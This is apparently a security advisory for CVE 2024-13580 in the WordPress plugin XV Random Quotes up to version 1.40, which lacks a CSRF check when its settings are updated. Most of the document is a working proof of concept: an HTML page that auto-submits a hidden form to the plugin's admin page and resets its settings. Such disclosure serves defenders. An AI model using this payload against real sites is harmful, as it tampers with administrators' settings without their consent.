XV Random Quotes <= 1.40 – Settings Reset via CSRF | CVE 2024-13580

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack

Proof of Concept

Note: settings need to have been changed for this to work.

Have an admin open an HTML file containing:

```
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Auto-Submit Form</title>
<script>
// If the form needs to be submitted automatically upon page load, you can use JavaScript to do so
window.onload = function() {
  // Automatically submit form
  document.getElementById("autoSubmitForm").submit();
};
</script>
</head>
<body>

<form id="autoSubmitForm" action="https://example.com/wp-admin/admin.php?page=stray_tools" method="post">
  <input type="hidden" name="resetsettings" value="Reset+Settings">
  <input type="hidden" name="do" value="Update">
</form>

</body>
</html>
```